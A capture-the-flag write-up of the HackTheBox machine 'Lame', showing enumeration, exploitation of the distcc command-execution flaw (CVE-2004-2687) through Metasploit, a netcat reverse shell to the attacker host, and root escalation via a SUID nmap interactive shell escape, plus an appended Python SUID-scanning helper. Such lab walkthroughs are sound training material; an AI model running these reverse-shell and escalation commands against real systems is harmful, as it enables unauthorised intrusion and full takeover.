Lame

Skills

  • Nmap SUID exploitation
  • Distcc exploitation [CVE-2004-2687]

Certifications

  • eJPT

Description

Lame is an easy Linux machine. We get a foothold by exploiting a command-execution vulnerability in the distcc service, then escalate to root through a SUID binary (nmap).


Reconnaissance

We first check that the machine is up and infer its operating system from the ICMP TTL. Linux hosts normally reply with a TTL of 64; the 63 seen here means one intermediate router decremented it by one on the way back.

# ping 10.129.251.62
PING 10.129.251.62 (10.129.251.62) 56(84) bytes of data.
64 bytes from 10.129.251.62: icmp_seq=1 ttl=63 time=62.6 ms
64 bytes from 10.129.251.62: icmp_seq=2 ttl=63 time=65.6 ms
^C
--- 10.129.251.62 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 62.561/64.096/65.632/1.535 ms

Nmap

We run default scripts and version detection against the open TCP ports found in the initial full-port sweep (21, 22, 139, 445 and 3632):

# nmap -sC -sV -p21,22,139,445,3632 10.129.251.62 -Pn -oN services  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 21:05 CEST
Nmap scan report for 10.129.251.62
Host is up (0.10s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-04T15:06:32-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m50s, deviation: 2h49m46s, median: 47s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.92 seconds


FTP Enumeration

Anonymous login is allowed on the FTP server, but the directory is empty, so there is nothing to take from it:

# ftp 10.129.251.62
Connected to 10.129.251.62.
220 (vsFTPd 2.3.4)
Name (10.129.251.62:justice-reaper): anonymous 
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||13756|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> 
ftp> exi
221 Goodbye.

SMB Enumeration

The tmp share is readable without credentials. We download what we can (some entries are denied), but none of the files is interesting:

# smbclient --no-pass //10.129.251.62/tmp 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul  4 21:18:55 2024
  ..                                 DR        0  Sat Oct 31 07:33:58 2020
  5632.jsvc_up                        R        0  Thu Jul  4 15:52:33 2024
  .ICE-unix                          DH        0  Thu Jul  4 15:51:22 2024
  vmware-root                        DR        0  Thu Jul  4 15:52:09 2024
  .X11-unix                          DH        0  Thu Jul  4 15:51:47 2024
  .X0-lock                           HR       11  Thu Jul  4 15:51:47 2024
  vgauthsvclog.txt.0                  R     1600  Thu Jul  4 15:51:20 2024

		7282168 blocks of size 1024. 5385828 blocks available
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
NT_STATUS_ACCESS_DENIED opening remote file \5632.jsvc_up
getting file \.X0-lock of size 11 as .X0-lock (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \vgauthsvclog.txt.0 of size 1600 as vgauthsvclog.txt.0 (4.1 KiloBytes/sec) (average 2.6 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \vmware-root\*
NT_STATUS_ACCESS_DENIED opening remote file \.X11-unix\X0
smb: \> exit

Distcc Enumeration

Enumerating distcc with the Nmap NSE script confirms that the daemon is vulnerable to CVE-2004-2687: it executes whatever command is sent to it as a compile job. Here `id` runs as the daemon user:

# nmap -p 3632 10.129.251.62 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 21:27 CEST
Nmap scan report for 10.129.251.62
Host is up (0.063s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

Distcc Exploitation

We use the Metasploit module exploit/unix/misc/distcc_exec to get a shell on the target:

# msfconsole
msf6 >  use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf6 exploit(unix/misc/distcc_exec) > set RHOST 10.129.251.62
RHOST => 10.129.251.62
msf6 exploit(unix/misc/distcc_exec) > set LHOST 10.10.16.15
LHOST => 10.10.16.15
msf6 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP handler on 10.10.16.15:4444 
[*] Command shell session 1 opened (10.10.16.15:4444 -> 10.129.251.62:44845) at 2024-07-04 21:43:59 +0200

whoami
daemon
ls
5632.jsvc_up
vgauthsvclog.txt.0
vmware-root

The command shell Metasploit gives us is not comfortable to work with, so we switch to a netcat reverse shell. With a listener already waiting on port 443 on our machine, we run this command from the Metasploit session:

nc -c /bin/bash 10.10.16.15 443

On our machine, netcat listens on port 443 and receives the connection:

# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.15] from (UNKNOWN) [10.129.251.62] 36954
bash: cannot set terminal process group (1027): Inappropriate ioctl for device
bash: no job control in this shell
daemon@lame:/tmp$ 

We note the dimensions of our own terminal so we can set them on the remote TTY later:

# stty size
45 183

We upgrade the shell to a fully interactive TTY (the first command runs on the target, the stty/fg step on our own machine, the rest on the target again):

(target)   daemon@lame:/tmp$ script /dev/null -c bash
           [CTRL + Z]
(attacker) # stty raw -echo; fg
           [ENTER]
(target)   daemon@lame:/tmp$ reset xterm
(target)   daemon@lame:/tmp$ export TERM=xterm
(target)   daemon@lame:/tmp$ export SHELL=bash
(target)   daemon@lame:/tmp$ stty rows 45 columns 183

We now have a fully interactive shell:

daemon@lame:/tmp$ whoami
daemon

Privilege Escalation

We search for SUID binaries and find nmap among them:

daemon@lame:/tmp$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper

This nmap (4.53) still has an interactive mode, and its `!` escape runs a command through the shell from inside the SUID process, so the shell inherits root's effective uid. If the shell drops the privileges (bash does so unless started with `-p`), `!sh -p` keeps them; here plain `!sh` is enough:

daemon@lame:/tmp$ nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# whoami
root
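
The SUID hunt and the nmap version check above can be scripted. The following Python helpers are an added example (not from the original writeup): `find_suid` walks the filesystem like the `find / -perm -4000` command and yields each SUID file with its owner's uid (filter on uid 0 for root-owned ones), `parse_nmap_version` pulls the version out of the interactive banner or `nmap --version`, and `nmap_has_interactive` tells whether that release still has `--interactive` and its `!` shell escape (present in Nmap 2.02 through 5.21, the range documented on GTFOBins; the page's 4.53 falls inside it). The parser assumes Nmap's two-digit minor version convention (4.53, 5.21, 7.94).

```python
#!/usr/bin/env python3
"""SUID triage helpers for the nmap --interactive escalation (added example, not from the page)."""
import os
import re
import stat
from typing import Iterator, Optional, Tuple

# Pseudo-filesystems that only add noise to a SUID hunt.
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def find_suid(root: str = "/") -> Iterator[Tuple[str, int]]:
    """Yield (path, owner_uid) for every regular file with the SUID bit set.

    Equivalent to `find / -perm -4000 -type f 2>/dev/null`; unreadable
    directories are skipped silently. Filter on owner_uid == 0 for the
    root-owned binaries that matter for privilege escalation.
    """
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid


# Assumes Nmap's two-digit minor convention, e.g. 4.53, 5.21, 7.94SVN.
_VERSION_RE = re.compile(r"\b(\d+)\.(\d{2})")


def parse_nmap_version(banner: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from an Nmap banner.

    Works for both 'Starting Nmap V. 4.53 ( http://insecure.org )' (interactive
    mode) and 'Nmap version 7.94SVN ( https://nmap.org )' (nmap --version).
    """
    m = _VERSION_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def nmap_has_interactive(version: Tuple[int, int]) -> bool:
    """True if this release still ships --interactive and its '!' shell escape.

    Interactive mode exists in Nmap 2.02 through 5.21 (range documented by
    GTFOBins); newer releases removed it, so a SUID nmap 7.x needs another vector.
    """
    return (2, 2) <= version <= (5, 21)


def suid_nmap_candidates(root: str = "/") -> Iterator[str]:
    """Paths of root-owned SUID files named nmap."""
    for path, uid in find_suid(root):
        if uid == 0 and os.path.basename(path) == "nmap":
            yield path


if __name__ == "__main__":
    # Same listing as the find command in the writeup, with the owner uid first.
    for path, uid in find_suid():
        print(f"{uid:>6}  {path}")
```

Once a candidate is confirmed with `nmap_has_interactive`, the escalation is the interactive session shown above. If `!sh` comes back as the daemon user, the shell reset its effective uid (bash does this unless started with `-p`); `!sh -p` keeps euid 0.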

This post is licensed under CC BY 4.0 by the author.